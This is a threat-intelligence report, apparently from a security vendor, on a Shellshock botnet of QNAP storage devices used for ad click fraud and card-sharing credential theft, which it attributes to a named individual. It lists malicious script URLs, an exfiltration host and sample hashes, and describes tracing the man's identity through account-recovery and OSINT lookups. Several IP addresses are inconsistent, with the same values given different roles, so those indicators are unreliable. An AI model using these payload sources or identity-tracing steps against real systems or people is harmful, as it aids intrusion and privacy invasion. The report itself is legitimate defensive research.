On June 18th, 2016, Fabio Gapserini, an Italian national was arrested in Amsterdam, Netherlands, at the request of the United States Department of Justice, accused of creating a global botnet of hacked QNAP Network Attached Storage devices with the ultimate motivation of performing advertisement click fraud. In a trial which concluded on August 4th, 2017, Fabio Gasperini was found guilty of computer intrusion. This trial is the conclusion of an investigation which first began in December of 2014.
In this report we cover how Forkbombus Labs Learned Dynamic Deception technology, Hivemind, first discovered the alleged activity, identified the motivation of click fraud behind these attacks, and the ultimate discovery of the botmaster, Fabio Gasperini.
The Initial Exploitation Activity
On December 5th, 2014, Hivemind alerted our analysts to a new Shellshock (CVE-2014-6271) activity sourcing from a QNAP Network Attached Storage device located in Spain (Figure 1).
Exploited QNAP devices were then instructed to download and execute a bash script, from one of numerous identified sources. Over the course of our investigation, we’ve identified 10 distinct Shellshock payloads related to the botnet. (Figure 2)
|Payload||Count||First Seen (EST)||Last Seen (EST)|
| ||2,511||2014-12-06 02:13:41||2015-03-13 14:54:54|
| ||600||2014-12-05 10:15:04||2015-03-13 11:01:29|
| ||286||2014-12-17 17:18:20||2015-03-12 17:23:38|
| ||125||2014-12-07 09:12:31||2015-03-07 18:27:28|
| ||95||2014-12-28 04:35:02||2015-03-05 05:33:55|
| ||77||2014-12-14 02:09:00||2015-02-04 21:47:37|
| ||40||2015-01-06 13:17:16||2015-03-09 02:32:43|
| ||5||2014-12-18 09:48:53||2015-02-02 22:03:24|
| ||1||2014-12-08 14:03:00||2014-12-08 14:03:00|
| ||1||2014-12-22 18:56:43||2014-12-22 18:56:43|
Figure 2. Table highlighting the details of observed shellshock payloads
From these Shellshock payloads, 8 distinct URLs were instructed to be downloaded.
With the exception of URLs ending in
io.php, these files configured the QNAP devices to download further resources, join the botnet, and engage in further worm-type propagation. These S0 scripts additionally served several other purposes (Figures 3 through 8).
Lightaidra IRC Bot
Above, Figure 6 highlights the botnet’s installation script downloading a Lightaidra IRC Bot binary, and configures the QNAP Botnet to run the Lightaidra IRC Bot binary on startup. Examining this binary gives us some initial clues.
$ sha256sum ..32 fe18e7a49018ef331819bb8eae2961fa36ac099933d5a34a5f53c9c61b79e14c ..32 $ md5sum ..32 dc2f1b4cb4a348c6f9abe598e72c486b ..32
Hash values of the 32 bit Lightaidra IRC Bot Binary
strings on the binary reveals the binary is configured to connect to an IRC server located at
188.8.131.52 over port
6667, and join the channel
#aidra (Figure 9).
UPX! is also observed several times, indicating the file has been packed with the UPX packer. Attempting to use UPX to unpack the
..32 file proves successful.
$ upx-ucl -d ..32 Ultimate Packer for eXecutables Copyright (C) 1996 - 2013 UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013 File size Ratio Format Name -------------------- ------ ----------- ----------- 48318 <- 21872 45.27% netbsd/elf386 ..32 Unpacked 1 file.
Unpacking the ..32 Lightaidra IRC Bot Binary
The unpacked binary now reveals several strings of interest. The Lightaidra IRC Bot binary attempts to retrieve its public IP address by accessing
http://ip.betfair2.eu/ip located at the
184.108.40.206 address (Figure 10). Notably, the
betfair2.eu domain appears to be reference to the Betfair online casino.
220.127.116.11 host was observed in the most prolific Shellshock payload. Research of this host reveals it was leased by UAServers. Performing a PTR record lookup for the
18.104.22.168 host revealed a domain name of
gaspolo.uaservers.net (Figure 11). At the time, UAServer’s was known to register PTR records with their client’s usernames, linked to the leased hosts, suggesting gaspolo is the username of the server’s renter.
In addition to the most prolific
http://22.214.171.124/S0.sh script, another script (
http://126.96.36.199/S00.sh) was observed a single time on December 8th, 2014, sourcing from a residential Italian IP address
188.8.131.52. While largely performing the same activity highlighted above in Figures 3 through 8, this script also downloads two further resources,
184.108.40.206/cl (Figure 12).
http://220.127.116.11/cl file is another Bash shell script. The purpose of this script is to identify CCcam Card Sharing credentials, and exfiltrate them to a script hosted at
ppoolloo.altervista.org (Figure 13).
http://18.104.22.168/emme script is another Bash shell script. The purpose of this script is to fraudulently view advertisements served by the JuiceADV advertisement service. This script reveals the user’s JuiceADV numeric user ID, and also the domain name
sempreinformato.eu which is meant to serve as the HTTP referrer of the visited advertisements. Part of this script retrieves a random HTTP User Agent string from a script located at
http://22.214.171.124/agent.php (Figure 14).
126.96.36.199 host is the same which was used to retrieve a bot’s public IP address detailed above in the Lightaidra IRC Bot Binary section.
sempreinformato.eu domain name was observed as the referrer for advertisements which the botnet fraudulently viewed. “Sempre Informato” roughly translates from Italian to English as “Always Informed”, supporting an Italian theme. The
sempreinformato.eu site is reportedly registered to a user with the e-mail of
[email protected] (Figure 15). Note the email of
[email protected], which matches the formerly discovered subdomain from the
The Italian host
188.8.131.52 was observed once by Hivemind on December 8th, 2014. According to an nmap scan performed on December 21st, the IP does not appear to host any services (Figure 16).
This host was observed scanning with the
S00.sh propagation script, which distinctly from the rest of the observed propagation scripts, contains references to a domain name registered to a citizen of Rome. These facts make it likely that the
184.108.40.206 host was in use by the attacker at the time of the attacks, and is not itself a separate compromised host.
[email protected] Email Address
The Google account Gaspolo was retrieved from the whois of the
SempreInformato.eu website. The Gaspolo alias matches the subdomain retrieved from the PTR record of the heavily utilized
220.127.116.11 asset. Initiating a Google Account recovery process for the
[email protected] account reveals the owner is named “Fabio Gasperini” (Figure 17).
Performing a Google search for
[email protected] revealed several links, including several blogspot.com blogs Fabio has authored regarding video game hacking (particularly Facebook games, such as “Pet Society”), where he guides his readers on how to cheat and “hack” these video games. The search also reveals mailing list results from as early as 2005 regarding system administration.
Fabio “Gaspolo” Gasperini
Performing a Google search for “Fabio Gaspolo Gasperini” reveals a Facebook post from Fabio Gasperini on November 15th, 2009, in which he promotes his (now defunct) website
gaspolo.it on a Facebook page titled “Pet Society tips, Tricks and Cheats” (Figure 18). Further, Fabio lists himself as living in Centocelle, Lazio, Italy, which is a section of Rome, Italy (Figure 19).
Tying It All Together
Through our research, we’ve been able to identify over 2,500 distinct hosts involved in this activity. The most prolific host used in the propagation of botnet resources,
18.104.22.168, gives us our first clue as to the botmasters identity- The nickname Gaspolo. Analyzing the retrieved IRC bot binary reveals other related indicators, such as the
22.214.171.124 IP address. While monitoring for related activity, Hivemind was able to identify the lone
S00.sh attempt which offers the direct insight to the Advertisement Fraud and Card Sharing Credential Theft motivations of the attacker.
The advertisement fraud provides our first real glimpse at our attacker. This also gives the first indication that the party responsible for the infrastructure and propagation of the botnet is the same individual who is profiting from the advertisement fraud: Gaspolo. By exploring information related to the uncovered gaspolo identities reveals his true identity as Fabio Gasperini, a citizen of Rome, Italy.
While the botnet was observed propagating in a worm fashion, the exploit attempt which strongly leads to identifying the attacker as Fabio Gasperini also sources from a residential Italian connection which itself did not reveal itself as a QNAP NAS (or any particular) device. Furthermore, resources used in the advertisement fraud were also used in the IRC Bot propagation. This shared resource being linked to
betfair2.eu, potentially being related to the European Gambling website Betfair, which is later correlated with Bleeping Computer’s article introducing Fabio’s employment with an online Gambling website.
Hivemind Intelligent Deception
Hivemind is Forkbombus Labs’ patent pending A.I. Driven Deception Technology. Standard honeypots and deception technologies imitate a predetermined service or environment. This becomes problematic as attackers capabilities and interests often differ than what static deceptions offer. Despite attackers stumbling upon static honeypots, these technologies are often overlooked by attackers who favor different scenarios. When attackers fail to engage with deception technologies, defenders fail to gain valuable intelligence which enables intelligent responses to attacks.
As Hivemind learns an attacker’s capabilities and motivations, Hivemind sensors instantly alter their appearance to each attacker to emulate what they are most likely to interact with. Hivemind ensures attackers are more likely to engage Hivemind sensors, leveraging attackers to divulge unparalleled information about themselves and their intentions as possible. This enhanced collections capabilities enables defenders to rapidly detect attacker’s resources, motivations, and identities, allowing defenders to respond to threats quicker and more intelligently than ever before. Attackers that engage with Hivemind increase their costs while saving defenders time and money.
The information in this article is provided as is and without warranty and does not represent professional advice or services.
Forkbombus Labs is not responsible for any loss or damages from actions taken based on information within this publication.
In the interest of saving space and protecting non-suspect identities, some images may be redacted or cropped. Forkbombus Labs asserts that no provided evidence has been altered or misrepresented, and only non-contributing information has been redacted.
While all information represented in this document is believed to be accurate, Forkbombus Labs and any contributing entities are not responsible or liable for repercussions from the use or misuse of any information provided throughout this document, or in any resulting correspondence related to this document. Receiving parties are responsible for independently verifying the information outlined in this document.